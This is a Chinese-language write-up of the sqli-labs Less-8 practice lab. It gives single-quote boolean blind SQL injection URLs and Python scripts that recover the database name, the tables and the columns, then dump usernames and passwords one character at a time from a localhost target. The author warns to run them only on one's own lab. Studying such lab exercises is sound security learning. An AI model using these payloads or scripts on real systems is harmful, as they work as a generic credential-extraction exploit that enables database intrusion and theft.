sqli-Labs Less-8
又是鸽了好几天没有做题了,今天想起来赶紧补上(本想保持一两天一道的速度快速做完前二十三道题,疯狂摆)
老规矩上来先测闭合类型:
http://localhost/sqli-labs/Less-8/index.php?id=1
http://localhost/sqli-labs/Less-8/index.php?id=1'
http://localhost/sqli-labs/Less-8/index.php?id=1' and 1=2 --+
id=1 正常回显,id=1' 无回显,加上 and 1=2 --+ 同样无回显,而且页面不输出任何 SQL 报错信息,所以是单引号闭合的布尔盲注:只有 You are in… 和无回显两种状态,既拿不到报错也拿不到查询结果,只能靠真/假两种页面的差异一个字符一个字符地猜,布尔盲注那就上手去试吧
因为练习这么多关都知道数据库名字和字段了,直接给出所有语句,具体思路就是不断去更改判断条件看有无回显,直到试出正确名称,自己练题手动去多打打语句找找感觉,实操建议上脚本工具,手动跑工作量太大了(脚本只拿自己本机的 sqli-labs 练手,不要对没有授权的目标跑)
判断版本:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(version(),3)=5.7 --+ (5.7 是作者本机的 MySQL 版本,按自己环境改;left() 返回的是字符串而 5.7 是数字,MySQL 会做隐式类型转换,稳妥起见写成 '5.7')
判断数据库长度:
http://localhost/sqli-labs/Less-8/index.php?id=1' and length(database())=8 --+
数据库名称:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(database(),8)='security' --+
数据库表的数量(count 的是 information_schema.tables 里当前库的表名):
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
数据库表名(按 limit 偏移一张一张地猜):
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+ (emails表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),8)='referers' --+ (referers表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),7)='uagents' --+ (uagents表)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+ (users表)
users表字段数:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3 --+
users表字段:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password' --+
到了跑用户名和密码的时候我发现不能这么列了,还是得写一个脚本批量去跑数据,就去研究了一下python脚本怎么写,因为自己现学python,水平有限也是参考了诸多大佬的文章,现在将各部分代码给出
测试数据库长度:
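# Step 1 of the boolean-blind walk-through: find length(database()) by asking
# the page "is it n?" for n = 1..19 and watching for the TRUE marker.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
# Text the page prints only when the injected condition is TRUE; kept as bytes
# because it is searched in resp.content (bytes).
TRUE_MARKER = "You are in...........".encode()


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value is passed via `params` so requests URL-encodes it; concatenating
    the payload onto the URL by hand breaks as soon as it contains `#`, `&`,
    `%` or `+`.  The trailing `-- ` comments out the rest of the lab's query.
    """
    import requests  # local import so find_count() can be reused/tested without the HTTP client
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def find_count(ask, candidates=range(1, 20)):
    """Return the first n in `candidates` for which ask(n) is True, or None.

    ask(n) is a boolean oracle such as "does length(database()) equal n?".
    None means no candidate matched: widen `candidates` rather than trust a
    partial result.
    """
    for n in candidates:
        if ask(n):
            return n
    return None


if __name__ == "__main__":
    length = find_count(lambda n: _ask("length(database())={}".format(n)))
    if length is None:
        print('1-19 内没有匹配的长度')
    else:
        print('对比成功长度为', length)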
获取数据库名称:
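# Step 2: recover database() one character at a time through the boolean oracle.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition
# Candidates tried at each position, in this order.  Lowercase is enough here:
# MySQL's default collations compare case-insensitively, so 's' also matches 'S'.
CHARSET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '=', '+', '.', '?', '|', '/']


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value goes through `params` so requests URL-encodes it.  This matters
    here: CHARSET contains `#` (would be dropped as a URL fragment together
    with the `-- ` terminator), `&` (starts a new parameter), `%` and `+`,
    which all corrupt the query when glued onto the URL by hand.
    """
    import requests  # local import so the pure helpers below can be reused/tested without it
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def prefix_condition(prefix):
    """SQL condition that is TRUE when database() starts with `prefix`.

    `prefix` is interpolated inside single quotes; CHARSET contains neither a
    quote nor a backslash, so it cannot break out of the literal.
    """
    return "left(database(),{})='{}'".format(len(prefix), prefix)


def extract_string(ask, charset=CHARSET, max_len=9, on_match=None):
    """Recover a string with a prefix oracle, one character per round.

    ask(prefix) must return True when the hidden value starts with `prefix`.
    Every position tries `charset` in order and keeps the first hit;
    on_match(pos, found_so_far) is called after each recovered character.
    The search stops at `max_len`, or as soon as no candidate extends the
    prefix -- the end of the value, or a character missing from `charset`
    (then the result is truncated and should be re-run with a wider charset).
    """
    found = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            if ask(found + ch):
                found += ch
                if on_match is not None:
                    on_match(pos, found)
                break
        else:
            break  # no candidate matched this position: nothing more to recover
    return found


if __name__ == "__main__":
    database_name = extract_string(
        lambda prefix: _ask(prefix_condition(prefix)),
        on_match=lambda pos, found: print('匹配第', pos, '位成功'),
    )
    print('database name is', database_name)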
获取数据库表的数量:
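# Step 3: count the tables in database() by asking "is it n?" for n = 1..9.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value is passed via `params` so requests URL-encodes it instead of
    relying on a hand-built query string.
    """
    import requests  # local import so find_count() can be reused/tested without the HTTP client
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def find_count(ask, candidates=range(1, 10)):
    """Return the first n in `candidates` for which ask(n) is True, or None.

    ask(n) is a boolean oracle, here "does the current schema hold n tables?".
    None means nothing matched in the range: widen `candidates`.
    """
    for n in candidates:
        if ask(n):
            return n
    return None


if __name__ == "__main__":
    table_count = find_count(lambda n: _ask(
        "(select count(table_name) from information_schema.tables "
        "where table_schema=database())={}".format(n)))
    if table_count is None:
        print('1-9 内没有匹配的数量')
    else:
        print('对比成功长度为', table_count)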
获取数据库表名:
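# Step 4: recover the names of the 4 tables in database(), one table at a time.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition
# Candidates tried at each position, in this order (lowercase suffices under
# MySQL's case-insensitive default collations).
CHARSET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '$', '^', '*', '(', ')', '-', '_', '=', '.', '?', '|', '/']
TABLE_COUNT = 4     # result of the count(table_name) probe in the previous step
MAX_NAME_LEN = 19   # positions tried per name


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value goes through `params` so requests URL-encodes it; gluing the
    payload onto the URL breaks on `#`, `&`, `%` or `+`.
    """
    import requests  # local import so the pure helpers below can be reused/tested without it
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def table_name_condition(index, prefix):
    """SQL condition: the `index`-th (0-based, in the server's LIMIT order)
    table name of database() starts with `prefix`.

    `prefix` lands inside single quotes; CHARSET has no quote or backslash.
    """
    return ("left((select table_name from information_schema.tables "
            "where table_schema=database() limit {},1),{})='{}'"
            ).format(index, len(prefix), prefix)


def extract_string(ask, charset=CHARSET, max_len=MAX_NAME_LEN, on_match=None):
    """Recover a string with a prefix oracle, one character per round.

    ask(prefix) must return True when the hidden value starts with `prefix`.
    Each position tries `charset` in order and keeps the first hit;
    on_match(pos, found_so_far) is called after each recovered character.
    Stops at `max_len` or as soon as no candidate extends the prefix (end of
    the value, or a character missing from `charset` -- result is truncated).
    """
    found = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            if ask(found + ch):
                found += ch
                if on_match is not None:
                    on_match(pos, found)
                break
        else:
            break  # no candidate matched this position: nothing more to recover
    return found


if __name__ == "__main__":
    # One loop replaces the four copy-pasted per-table branches of the original.
    names = []
    for idx in range(TABLE_COUNT):
        name = extract_string(
            lambda prefix: _ask(table_name_condition(idx, prefix)),
            on_match=lambda pos, found: print('匹配第', idx + 1, '张表第', pos, '位成功'),
        )
        names.append(name)
    for k, name in enumerate(names, 1):
        print('字段{}为'.format(k), name)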
获取users表字段数:
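# Step 5: count the columns of the users table by asking "is it n?" for n = 1..9.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value is passed via `params` so requests URL-encodes it instead of
    relying on a hand-built query string.
    """
    import requests  # local import so find_count() can be reused/tested without the HTTP client
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def find_count(ask, candidates=range(1, 10)):
    """Return the first n in `candidates` for which ask(n) is True, or None.

    ask(n) is a boolean oracle, here "does users have n columns?".
    None means nothing matched in the range: widen `candidates`.
    """
    for n in candidates:
        if ask(n):
            return n
    return None


if __name__ == "__main__":
    column_count = find_count(lambda n: _ask(
        "(select count(column_name) from information_schema.columns "
        "where table_schema=database() and table_name='users')={}".format(n)))
    if column_count is None:
        print('1-9 内没有匹配的数量')
    else:
        print('对比成功长度为', column_count)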
获取users表字段:
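# Step 6: recover the 3 column names of the users table, one column at a time.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition
# Candidates tried at each position, in this order (lowercase suffices under
# MySQL's case-insensitive default collations).
CHARSET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '$', '^', '*', '(', ')', '-', '_', '=', '.', '?', '|', '/']
COLUMN_COUNT = 3    # result of the count(column_name) probe in the previous step
MAX_NAME_LEN = 19   # positions tried per name


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value goes through `params` so requests URL-encodes it; gluing the
    payload onto the URL breaks on `#`, `&`, `%` or `+`.
    """
    import requests  # local import so the pure helpers below can be reused/tested without it
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def column_name_condition(index, prefix):
    """SQL condition: the `index`-th (0-based, in the server's LIMIT order)
    column name of users starts with `prefix`.

    `prefix` lands inside single quotes; CHARSET has no quote or backslash.
    """
    return ("left((select column_name from information_schema.columns "
            "where table_schema=database() and table_name='users' limit {},1),{})='{}'"
            ).format(index, len(prefix), prefix)


def extract_string(ask, charset=CHARSET, max_len=MAX_NAME_LEN, on_match=None):
    """Recover a string with a prefix oracle, one character per round.

    ask(prefix) must return True when the hidden value starts with `prefix`.
    Each position tries `charset` in order and keeps the first hit;
    on_match(pos, found_so_far) is called after each recovered character.
    Stops at `max_len` or as soon as no candidate extends the prefix (end of
    the value, or a character missing from `charset` -- result is truncated).
    """
    found = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            if ask(found + ch):
                found += ch
                if on_match is not None:
                    on_match(pos, found)
                break
        else:
            break  # no candidate matched this position: nothing more to recover
    return found


if __name__ == "__main__":
    # One loop replaces the three copy-pasted per-column branches of the original.
    names = []
    for idx in range(COLUMN_COUNT):
        name = extract_string(
            lambda prefix: _ask(column_name_condition(idx, prefix)),
            on_match=lambda pos, found: print('匹配第', idx + 1, '张表第', pos, '位成功'),
        )
        names.append(name)
    for k, name in enumerate(names, 1):
        print('字段{}为'.format(k), name)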
三个表的字段数自己手试一试就好,比写脚本要快的多,或者直接脚本大范围去试一样的
最后就是导出username和password
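# Final step: dump users.username and users.password row by row.
URL = 'http://localhost/sqli-labs/Less-8/index.php'  # adjust to your own sqli-labs path
TRUE_MARKER = "You are in...........".encode()  # page text shown only on a TRUE condition
# Candidates tried at each position, in this order.
CHARSET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
           'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
           'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
           'Z', '.']
# Rows are addressed by primary key.  The original loop walked id = 0..12; adjust
# this to the ids actually present in your users table (an absent id just yields '').
ROW_IDS = range(0, 13)
MAX_LEN = 19  # positions tried per value


def _ask(condition):
    """Inject `id=1' and <condition> -- ` and return True if the TRUE marker appears.

    The value goes through `params` so requests URL-encodes it rather than
    relying on a hand-built query string.
    """
    import requests  # local import so the pure helpers below can be reused/tested without it
    resp = requests.get(URL, params={"id": "1' and {} -- ".format(condition)})
    return TRUE_MARKER in resp.content


def column_condition(column, row_id, prefix):
    """SQL condition: `column` of the users row with id=row_id starts with `prefix`.

    `column` is spliced in as an identifier and `prefix` inside single quotes;
    both are constants of this script (CHARSET has no quote or backslash).
    NOTE: under a case-insensitive collation (the MySQL default) 'a' and 'A'
    compare equal, so the lowercase candidate is hit first and the recovered
    case can be wrong even though CHARSET lists uppercase letters; wrap the
    left(...) in `binary` if exact case matters.
    """
    return "left((select {} from users where id ={}),{})='{}'".format(
        column, row_id, len(prefix), prefix)


def extract_string(ask, charset=CHARSET, max_len=MAX_LEN, on_match=None):
    """Recover a string with a prefix oracle, one character per round.

    ask(prefix) must return True when the hidden value starts with `prefix`.
    Each position tries `charset` in order and keeps the first hit;
    on_match(pos, found_so_far) is called after each recovered character.
    Stops at `max_len` or as soon as no candidate extends the prefix (end of
    the value, or a character missing from `charset` -- result is truncated).
    """
    found = ''
    for pos in range(1, max_len + 1):
        for ch in charset:
            if ask(found + ch):
                found += ch
                if on_match is not None:
                    on_match(pos, found)
                break
        else:
            break  # no candidate matched this position: nothing more to recover
    return found


def dump_column(oracle_for_row, row_ids=ROW_IDS):
    """Recover one value per id in `row_ids`; returns them in the same order.

    oracle_for_row(row_id) must return a prefix oracle for that row.  Progress
    (and the partially filled list) is printed after every recovered
    character, as the original script did.
    """
    row_ids = list(row_ids)
    values = [''] * len(row_ids)
    for slot, row_id in enumerate(row_ids):
        def report(pos, found):
            values[slot] = found
            print('匹配第', row_id, '个字段第', pos, '位成功')
            print(values)
        values[slot] = extract_string(oracle_for_row(row_id), on_match=report)
    return values


if __name__ == "__main__":
    usernames = dump_column(
        lambda rid: (lambda prefix: _ask(column_condition('username', rid, prefix))))
    # The original second loop reused the username payload here, so "passwords"
    # were just usernames again; the password column is now actually queried.
    passwords = dump_column(
        lambda rid: (lambda prefix: _ask(column_condition('password', rid, prefix))))
    print('字段username', usernames)
    print('字段password', passwords)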